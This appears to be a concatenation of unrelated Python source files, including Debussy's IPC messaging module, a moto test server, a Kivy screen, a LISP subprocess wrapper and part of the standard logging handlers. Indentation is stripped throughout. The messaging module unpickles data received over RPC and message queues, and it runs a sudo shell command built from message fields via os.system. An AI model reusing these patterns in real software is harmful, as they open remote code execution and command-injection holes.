"""threads = []
for j in games:
threads.append(thrd.Thread(target=j.playgame))
threads[-1].start()
threads[-1].join()"""
"""processes = []
for j in games:
processes.append(mp.Process(target=j.playgame))
processes[-1].start()
processes[-1].join()"""
print(f"Training time: {time.time() - trainingTimeStart}")
generationResults = []
f = open("generationResults.txt", "rb")
for _ in range(numberOfGames):
generationResults.append(pickle.load(f))
f.close()
bestInGeneration = generationResults[0]
for j in generationResults:
if j[2] > bestInGeneration[2]:
bestInGeneration = j
f.close()
f = open("generationResults.txt", "wb")
pickle.dump(bestInGeneration, f)
f.close() |
messaging.py | """
Abstraction for communicating between Debussy's processes: the main CLI, the
OpenFlow manager, and the database triggers.
"""
import os
import pickle
import threading
import time
import xmlrpclib
import sysv_ipc
from SimpleXMLRPCServer import SimpleXMLRPCServer
import debussy.profiling
from debussy.log import logger
from debussy.of import OFPP_FLOOD, OFPFC_ADD, OFPFC_DELETE, OFPFC_DELETE_STRICT
def clear_queue(queue_id):
try:
mq = sysv_ipc.MessageQueue(queue_id,
sysv_ipc.IPC_CREAT,
mode=0777)
mq.remove()
except sysv_ipc.PermissionsError:
logger.warning("could not clear clear message queue {0}"
.format(queue_id))
class ConsumableMessage(object):
"A consumable message"
def consume(self, consumer):
"""Consume the message
consumer: an object containing a function to consume the message"""
pass
class MessageSender(object):
"A message sender"
def send(self, msg):
"""Send the specified message
msg: the message to send"""
pass
class MessageReceiver(object):
"A message receiver"
def start(self):
"Start a new thread to receive messages"
pass
def stop(self, event=None):
"""Stop the receiver thread
event: an optional quit message"""
pass
class MsgQueueSender(MessageSender):
"A message queue-based message sender"
def __init__(self, queue_id):
"queue_id: the integer id of the queue to be used"
self.queue_id = queue_id
pc = debussy.profiling.PerfCounter("mq_connect")
pc.start()
try:
self.mq = sysv_ipc.MessageQueue(self.queue_id,
mode=0777)
except sysv_ipc.ExistentialError, e:
logger.warning("queue {0} does not exist: {1}"
.format(self.queue_id, e))
self.mq = sysv_ipc.MessageQueue(self.queue_id,
sysv_ipc.IPC_CREAT,
mode=0777)
pc.stop()
def send(self, msg):
"""Send the specified message
msg: the message to send"""
pc = debussy.profiling.PerfCounter("mq_send")
pc.start()
logger.debug("mq: sending message %s", msg)
self.mq.send(pickle.dumps(msg))
pc.stop()
class MsgQueueReceiver(MessageReceiver):
"A message queue-based message receiver"
def __init__(self, queue_id, consumer=None):
"""queue_id: the integer id of the queue to receive messages from
consumer: the consuming object for received messages"""
self.queue_id = queue_id
self.consumer = consumer
self.running = False
# clear message queue
clear_queue(self.queue_id)
self.mq = sysv_ipc.MessageQueue(self.queue_id,
sysv_ipc.IPC_CREAT,
mode=0777)
def start(self):
"Start a new thread to receive messages"
logger.debug("mq_receiver starting")
self.running = True
self.t = threading.Thread(target=self._run)
self.t.start()
def _run(self):
while self.running:
s,_ = self.mq.receive()
msg = s.decode()
obj = pickle.loads(msg)
logger.debug("mq: received message %s", msg)
if obj is not None:
obj.consume(self.consumer)
def stop(self, event=None):
"""Stop the receiver thread
event: an optional quit message"""
self.running = False
self.mq.send(pickle.dumps(None))
class RpcSender(MessageSender):
"A remote procedure call-based message sender"
def __init__(self, host, port):
"""host: the hostname or IP address of the RPC server
port: the port for the RPC server"""
self.addr = "http://{0}:{1}".format(host, port)
pc = debussy.profiling.PerfCounter("rpc_connect")
pc.start()
self.proxy = xmlrpclib.ServerProxy(self.addr, allow_none=True)
pc.stop()
def send(self, msg):
"""Send the specified message
msg: the message to send"""
logger.debug("rpc: sending message %s", msg)
pc = debussy.profiling.PerfCounter("rpc_send")
pc.start()
self.proxy.client_send(pickle.dumps(msg))
pc.stop()
class RpcReceiver(MessageReceiver):
"A remote procedure call-based message receiver"
def __init__(self, host, port, consumer=None):
"""host: the hostname or IP address of the RPC server
port: the port for the RPC server
consumer: the consuming object for received messages"""
self.host = host
self.port = port
self.consumer = consumer
self.server = SimpleXMLRPCServer((host, port),
logRequests=False,
allow_none=True)
self.server.register_function(self._client_send, "client_send")
self.msg = None
def _client_send(self, msg):
obj = pickle.loads(msg)
logger.debug("rpc: received message %s", msg)
if obj is not None:
print "CONSUMING MESSAGE", obj
obj.consume(self.consumer)
def start(self):
"Start a new thread to receive messages"
logger.debug("rpc_receiver starting")
self.running = True
self.t = threading.Thread(target=self._run)
self.t.start()
def _run(self):
while self.running:
self.server.handle_request()
def stop(self, event=None):
"""Stop the receiver thread
event: an optional quit message"""
self.running = False
addr = "http://{0}:{1}".format(self.host, self.port)
self.proxy = xmlrpclib.ServerProxy(addr, allow_none=True)
self.proxy.client_send(pickle.dumps(None))
class OvsSender(MessageSender):
"A message sender using ovs-ofctl to communicate with switches"
command = "/usr/bin/sudo /usr/bin/ovs-ofctl"
subcmds = { OFPFC_ADD : "add-flow",
OFPFC_DELETE : "del-flows",
OFPFC_DELETE_STRICT : "--strict del-flows"
}
def __init__(self):
pass
def send(self, msg):
"""Send the specified OpenFlow message
msg: the message to send"""
# don't need to handle barrier messages
if not hasattr(msg, 'command'):
return
pc = debussy.profiling.PerfCounter("ovs_send")
pc.start()
subcmd = OvsSender.subcmds[msg.command]
# TODO: this is different for remote switches (ie, on physical network)
dest = msg.switch.name
params = []
if msg.match.nw_src is not None:
params.append("nw_src={0}".format(msg.match.nw_src))
if msg.match.nw_dst is not None:
params.append("nw_dst={0}".format(msg.match.nw_dst))
if msg.match.dl_src is not None:
params.append("dl_src={0}".format(msg.match.dl_src))
if msg.match.dl_dst is not None:
params.append("dl_dst={0}".format(msg.match.dl_dst))
if msg.match.dl_type is not None:
params.append("dl_type={0}".format(msg.match.dl_type))
params.append("priority={0}".format(msg.priority))
actions = ["flood" if a == OFPP_FLOOD else str(a) for a in msg.actions]
if msg.command == OFPFC_ADD:
params.append("action=output:" + ",".join(actions))
paramstr = ",".join(params)
cmd = "{0} {1} {2} {3}".format(OvsSender.command,
subcmd,
dest,
paramstr)
ret = os.system(cmd)
pc.stop()
return ret
|
moto_server.py | """moto server for pytesting aws services."""
# pylint: disable=too-many-instance-attributes
# pylint: disable=unused-variable
import asyncio
import functools
import logging
import os
import socket
import threading
import time
# Third Party
import aiohttp
import moto.server
import werkzeug.serving
HOST = '127.0.0.1'
_PYCHARM_HOSTED = os.environ.get('PYCHARM_HOSTED') == '1'
_CONNECT_TIMEOUT = 90 if _PYCHARM_HOSTED else 10
def get_free_tcp_port(release_socket: bool = False) -> tuple:
"""Get an available TCP port.
Args:
release_socket (bool, optional): release socket. Defaults to False.
Returns:
tuple: socket and port
"""
sckt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sckt.bind((HOST, 0))
_, port = sckt.getsockname()
if release_socket:
sckt.close()
return port
return sckt, port
class MotoService:
"""Will Create MotoService.
Service is ref-counted so there will only be one per process. Real
Service will be returned by `__aenter__`.
"""
_services = {} # {name: instance}
_main_app: moto.server.DomainDispatcherApplication = None
def __init__(self, service_name: str, port: int = None):
self._service_name = service_name
if port:
self._socket = None
self._port = port
else:
self._socket, self._port = get_free_tcp_port()
self._thread = None
self._logger = logging.getLogger('MotoService')
self._refcount = None
self._ip_address = HOST
self._server = None
@property
def endpoint_url(self) -> str:
"""Get the server endpoint url.
Returns:
str: url
"""
return f'http://{self._ip_address}:{self._port}'
def __call__(self, func):
async def wrapper(*args, **kwargs):
await self._start()
try:
result = await func(*args, **kwargs)
finally:
await self._stop()
return result
functools.update_wrapper(wrapper, func)
wrapper.__wrapped__ = func
return wrapper
async def __aenter__(self):
svc = self._services.get(self._service_name)
if svc is None:
self._services[self._service_name] = self
self._refcount = 1
await self._start()
svc = self
else:
svc._refcount += 1
return svc
async def __aexit__(self, exc_type, exc_val, exc_tb):
self._refcount -= 1
if self._socket:
self._socket.close()
self._socket = None
if self._refcount == 0:
del self._services[self._service_name]
await self._stop()
def _server_entry(self):
self._main_app = moto.server.DomainDispatcherApplication(
moto.server.create_backend_app, service=self._service_name)
self._main_app.debug = True
if self._socket:
self._socket.close() # release right before we use it
self._socket = None
self._server = werkzeug.serving.make_server(
self._ip_address, self._port, self._main_app, True)
self._server.serve_forever()
async def _start(self):
self._thread = threading.Thread(target=self._server_entry, daemon=True)
self._thread.start()
async with aiohttp.ClientSession() as session:
start = time.time()
while time.time() - start < 10:
if not self._thread.is_alive():
break
try:
# we need to bypass the proxies due to monkeypatches
async with session.get(f'{self.endpoint_url}/static', timeout=_CONNECT_TIMEOUT):
pass
break
except (asyncio.TimeoutError, aiohttp.ClientConnectionError):
await asyncio.sleep(0.5)
else:
await self._stop() # pytest.fail doesn't call stop_process
raise Exception(f"Cannot start service: {self._service_name}")
async def _stop(self):
if self._server:
self._server.shutdown()
self._thread.join()
|
seasonscreen.py | import cfg
from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
from kivy.properties import *
from kivy.metrics import dp
import ytvApi as ytv
from threading import Thread
Builder.load_string('''
<SeasonScreen>:
name:'season_screen'
MDBoxLayout:
orientation:'vertical'
RecycleView:
id: season_rv
size_hint_y:None
key_viewclass: 'viewclass'
key_size: 'height'
bar_width:dp(8)
bar_inactive_color:.7,.7,.7,.4
RecycleBoxLayout:
id: season_rb
default_size: None, dp(50)
default_size_hint: None, None
size_hint_x: None
width: self.minimum_width
orientation: 'horizontal'
spacing:dp(2)
RecycleView:
id: others_rv
size_hint_y:
key_viewclass: 'viewclass'
key_size: 'height'
RecycleBoxLayout:
id: others_rb
default_size: None, None
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing:dp(2)
''')
class SeasonScreen(Screen):
seasons=ObjectProperty([])
episodes=ObjectProperty({})
count=0
def kill(self,*a):
self.episodes={}
self.seasons=''
self.ids.season_rv.scroll_x=0
def on_seasons(self,*a):
cfg.SM2=self.manager
self.ids.others_rv.data=[{'viewclass':'YLabel','text':f'Select a Season Above to View its Episodes','halign':'center','markup':True}]
if self.seasons:
data=[]
for no,i in enumerate(self.seasons,0):
data.append({'viewclass':'PageButton','text':f'{i.text}','group':'season','size_hint':[None,1],'width':dp(100),'season_number':no,'switch_page':self.switch_page,'season_check':no})
self.ids.season_rv.data=data
elif self.seasons !='':
self.ids.season_rv.data=[{'viewclass':'YLabel','text':f'Loading failed','size_hint_x':None}]
def switch_page(self,no,text):
self.ids.others_rv.scroll_y=1
self.count+=1
url=self.seasons[no].attrs['href']
def get_episodes(self,urlz,no,count,text):
self.ids.others_rv.data=[{'viewclass':'YLabel','text':f'Loading {text}...','halign':'center','markup':True}]
if e:=self.episodes.get(no):
self.ids.others_rv.data=e
return
e=ytv.get_episodes(urlz)
if e and False not in e:
data=[]
for atag in e:
data.append({'viewclass':'EpisodeButton','season_no':no,'stext':text,'atag': atag,'ripple_scale': 0.0})
self.episodes[no]=data
if count==self.count:
self.ids.others_rv.data=data
else:
self.ids.others_rv.data=[{'viewclass':'YLabel','text':f'Failed to Load {text}[u][i][b] \n[ref=retry]Try Again?[/ref] [/u][/i][/b] ','halign':'center','markup':True,'on_ref_press': lambda *a:self.switch_page(no)}]
Thread(target=get_episodes,args=(self,url,no,self.count,text,),daemon=True).start()
|
spatialreasoner.py | import os
import logging
import queue
import subprocess
import threading
from . import ccl as cclmod
# Term names
TERMS = [
'square',
'triangle',
'circle',
'line',
'cross',
'ell',
'vee',
'star',
'ess',
]
class SpatialReasoner():
def __init__(self, ccl):
self.logger = logging.getLogger(__name__)
self.ccl = ccl
self.exec_path = ccl.exec_path()
# Initialize spatialreasoner
self.initialize_spatialreasoner()
def initialize_spatialreasoner(self):
# Instantiate the result queue
self.resp_queue = queue.Queue()
# Start the LISP process
self.proc = subprocess.Popen(
[self.exec_path],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
# Register the readers
def stdout_reader(proc):
# Setup thread logger
logger = logging.getLogger(__name__ + '-reader')
logger.debug('Starting reader...')
queue_buffer = []
while True:
# Read text
text = proc.stdout.readline().decode('ascii').strip()
logger.debug('spatialreasoner:%s', text)
if 'TERMINATE' in text:
logger.debug('termination handling initiated...')
break
if text == '> Type :? for other options.':
logger.debug('error encountered. popping...')
self.resp_queue.put('ERROR')
break
if text == 'PREMISE FOLLOWS VALIDLY FROM PREVIOUS PREMISES.':
logger.debug('validity detected.')
queue_buffer.append('true')
if text == 'PREMISE IS INCONSISTENT WITH PREVIOUS PREMISES.':
logger.debug('invalidity detected.')
queue_buffer.append('false')
if text == 'PREMISE WAS PREVIOUSLY POSSIBLY TRUE.':
logger.debug('indeterminate true detected.')
queue_buffer.append('indeterminate-true')
if text == 'PREMISE WAS PREVIOUSLY POSSIBLY FALSE.':
logger.debug('indeterminate false detected.')
queue_buffer.append('indeterminate-false')
if text == '"SYNC"':
logger.debug("SYNC detected with queue buffer:%s", queue_buffer)
if queue_buffer:
self.resp_queue.put(queue_buffer)
queue_buffer = []
self.readerstdout = threading.Thread(target=stdout_reader, args=(self.proc,), daemon=True)
self.readerstdout.start()
# Create the FASL file if not existent
lisp_dir = os.path.abspath(os.path.split(os.path.abspath(__file__))[0] + '/lisp')
lisp_path = os.path.abspath(lisp_dir + '/spatial.lisp')
fasl_path = os.path.abspath(lisp_dir + '/spatial.{}'.format(cclmod.FSL_ENDINGS[self.ccl.system]))
fasl_path = fasl_path.replace('\\', '\\\\')
if not os.path.isfile(fasl_path):
self.logger.debug('compiling the lisp code...')
spatial_reasoner_file = lisp_path.replace('\\', '\\\\')
self._send('(compile-file "{}")'.format(spatial_reasoner_file))
# Load spatialreasoner
logging.debug('loading spatialreasoner fasl...')
self._send('(load "{}")'.format(fasl_path))
def _send(self, cmd, send_sync=False):
""" Send a command to the Clozure Common LISP subprocess.
Parameters
----------
cmd : str
Command to send.
"""
# Normalize the command
cmd = cmd.strip()
self.logger.debug('Send:%s', cmd)
self.proc.stdin.write('{}\n'.format(cmd).encode('ascii'))
self.proc.stdin.flush()
if send_sync:
self.logger.debug('Send:SYNC')
self.proc.stdin.write('{}\n'.format('(prin1 "SYNC")').encode('ascii'))
self.proc.stdin.flush()
def terminate(self):
""" Terminate mReasoner and its parent instance of Clozure Common LISP.
"""
# Shutdown the threads
self._send('(prin1 "TERMINATE")')
self.logger.debug('Waiting for stdout...')
self.readerstdout.join()
# Terminate Clozure
self._send('(quit)')
def query(self, problem):
self.logger.debug('Querying for problem "%s"', problem)
# Prepare the command to send
premises = ''.join(['({})'.format(x) for x in problem])
cmd = "(interpret '({}))".format(premises)
self.logger.debug('cmd: "%s"', cmd)
# Send the command
self._send(cmd, send_sync=True)
# Wait for the response
resp = self.resp_queue.get()
if resp == 'ERROR':
self.logger.info('Error detected. Restarting...')
self.proc.terminate()
self.initialize_spatialreasoner()
return ['false']
return resp
|
dataPreProcessing.py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 19:02:19 2021
@author: Jacob Salminen
@version: 1.0
"""
#%% IMPORTS
import os
import sys
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))
import multiprocessing as mp
from datetime import date
from localPkg.preproc import ProcessPipe
from os.path import dirname, join, abspath, exists
#%% Globals
dTime = date.today().strftime('%d%m%Y')
#%% Initialize Image Parsing/Pre-Processing
# change the 'start' in PARAMS to choose which file you want to start with.
#%% DEFINITIONS
def mainInput(im_list,q):
# for i in im_list:
q.put(ProcessPipe.mainLoop(im_list,rawDatDir,trainDatDir,savePath))
#endfor
#enddef
#%% LOOP: Image Parsing/Pre-Processing
if __name__ == '__main__':
#%% PATHS
# Path to file
cfpath = dirname(__file__)
aDatGenDir = abspath(join(cfpath,"..","a_dataGeneration"))
bDatAggDir = abspath(join(cfpath,"..","b_dataAggregation"))
# Path to images to be processed
rawDatDir = join(aDatGenDir,"rawData")
# Path to training files
trainDatDir = join(bDatAggDir,"processedData","EL-11122021")
# Path to aggregate data files
aggDatDir = join(bDatAggDir,"aggregateData")
savePath = join(aggDatDir,dTime)
im_list = [3,4,5,6,10,12,13,14,21,26,27,28,29,35] #[i for i in range(start,im_dir.dir_len)]
print("Number of processors: ", mp.cpu_count())
#%% Loop Start - Basic Loop
print('Starting PreProcessing Pipeline...')
# for i in im_list:
# result = ProcessPipe.mainLoop(i,rawDatDir,trainDatDir,savePath)
# break
# #endfor
#%% Loop Start - multiprocessing documentation ex
#! see. https://docs.python.org/3/library/multiprocessing.html !#
# ***(03/27/2022): make an implmentation in mpProcessPipe and mpDataManager.
# mp.set_start_method('spawn')
# q = mp.Queue()
# p = mp.Process(target = mainInput, args = (im_list,q))
# p.start()
# p.join()
#%% Loop Start - parallel processing
# import concurrent.futures
# with concurrent.futures.ProcessPoolExecutor() as executor:
# executor.map(mainLoop, im_list)
#endwith
#%% Loop Start - async-multi processing num. 1
from joblib import Parallel, delayed
threadN = mp.cpu_count()
results = Parallel(n_jobs=threadN)(delayed(ProcessPipe.mainLoop)(i,rawDatDir,trainDatDir,savePath) for i in im_list) # only one that works? (03/04/2022)
#%% Loop Start - async-multi processing num. 2
# pool = mp.Pool(mp.cpu_count())
# #! extract valid data into a neater structure !#
# tmpDat = results[0]
# X = []
# y = []
# for i in range(0,len(tmpDat)):
# X.append(tmpDat[i][0])
# y.append(tmpDat[i][1])
# #endfor
# print('done')
# # Save Data
# tmpDat = (X,y)
# tmpSaveDir = join(aggDatDir, ('joined_data_'+dTime+'.pkl'))
# DataManager.save_obj(tmpSaveDir,tmpDat)
#endif |
handlers.py | # Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import io, logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
namer = None
rotator = None
def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.mode = mode
self.encoding = encoding
self.errors = errors
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
if "b" not in mode:
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
delay=delay, errors=errors)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None,
errors=None):
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
delay=delay, errors=errors)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
